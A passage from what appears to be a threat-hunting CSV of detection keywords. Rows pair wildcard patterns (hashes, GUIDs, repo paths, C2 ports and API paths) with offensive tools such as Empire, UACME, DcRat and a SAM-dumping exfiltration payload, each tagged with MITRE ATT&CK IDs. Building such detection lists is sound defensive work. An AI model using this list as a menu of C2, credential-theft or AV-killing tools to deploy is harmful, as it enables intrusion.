and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*09323E4D-BE0F-452A-9CA8-B07D2CFA9804*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"*0971A047-A45A-43F4-B7D8-16AC1114B524*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","0","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" +"*0A1C2C46-33F7-4D4C-B8C6-1FC9B116A6DF*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","0","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" +"*0ac82760-3e0d-4124-bd1c-92c8dab97171*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","0","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" +"*0B6D8B01-861E-4CAF-B1C9-6670884381DB*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","0","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*0c6faff9d363f76f723c52ae8796bf7d37913c7117eaaeb9416728ca958975d4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*0D17A4B4-A7C4-49C0-99E3-B856F9F3B271*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*0d1n * --post * --payloads *","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","0","N/A","N/A",,"N/A",,, +"*0d1n --host*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","0","N/A","N/A",,"N/A",,, +"*0d1n*kill_listener.sh*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*0da59496e173b30d19c4f6c3ca62f2be8ef5b5e790c4952ac0d27f987577488f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*0DD419E5-D7B3-4360-874E-5838A7519355*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*0evilpwfilter*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*0evilpwfilter.dll*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*0fa31c8c34a370931d8ffe8097e998f778db63e2e036fbd7727a71a0dcf5d28c*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*0vercl0k/udmp-parser*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" +"*0x00-0x00*","offensive_tool_keyword","Github Username","Github pentester username with lots of different exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/0x00-0x00","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*0x09AL/DNS-Persist*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*0x09AL/IIS-Raid*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" +"*0x9999997B3deF7b69c09D7a9CA65E5242fb04a764*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*0xbadjuju/Tokenvator*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*0xbadjuju/WheresMyImplant*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*0xdarkvortex-MalwareDevelopment*","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","176","63","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" +"*0xdeadbeef*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" +"*0xsp-SRD/mortar*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" +"*0xthirteen/MoveKit*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*0xthirteen/PerfExec*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","1","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" +"*0xthirteen/SharpRDP*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*0xthirteen/StayKit*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*0xthirteen/StayKit*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*1_FindDomain.sh*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*105C2C6D-1C0A-4535-A231-80E355EFB112*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*10979d6665292065b840f8d95366201a686146e949908cdd41331699b331ab9c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*10b06fce5935839c3978cd7fe130355be750cfa03986adff5c33bd9f7922871e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*10f5885eb8ecc5ecbbea6717ba163761b34a416c7beff36276e7b590f39161b9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*10k-worst-pass.txt*","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*11385CC1-54B7-4968-9052-DF8BB1961F1E*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*119.45.104.153:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*12372473c8b8cc25108b254a5ed994ee3895687236f8ad062006c1d8f6916475*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*123abcbde966780cef8d9ec24523acac*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","0","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" +"*124e6ada27ffbe0ff97f51eb9d7caaf86b531bcff90ed5a075ff89b45b00cba5*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*127.0.0.1:1080*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*127.0.0.1:1337*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*127.0.0.1:2222*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*127.0.0.1:31337*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*127.0.0.1:4567*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" +"*127.0.0.1:53531*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*127.0.0.1:5555*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*127.0.0.1:8022*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*127.0.0.1:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*127.0.0.1:9050*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*1337*/api/agents/*/results?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*1337*/api/creds?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*1337*/api/listeners?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*1337*infernal-twin*","offensive_tool_keyword","infernal-twin","This tool is created to aid the penetration testers in assessing wireless security.","T1533 - T1553 - T1560 - T1569 - T1583","TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/entropy1337/infernal-twin","1","1","N/A","N/A","10","1193","273","2022-10-27T11:39:14Z","2015-02-07T21:04:57Z" +"*1337OMGsam*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*1337OMGsys*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*133f71bd8d6d4ca80a9a542c2492ba9a65e05b0cfa681a85dd05d9cf998a1bb4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*1424fde08d6994062fc8a795ff8d80d30060c4991103c4af59228dcf60171eca*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*1617117C-0E94-4E6A-922C-836D616EC1F5*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*16726c4330d7db5d56a5a11503314533b170783441c3f8282b66f126295a289e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*175c9fc0c7046d006a6db698144fab3b40bd191e15617e7fba417a466c3a0b6f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 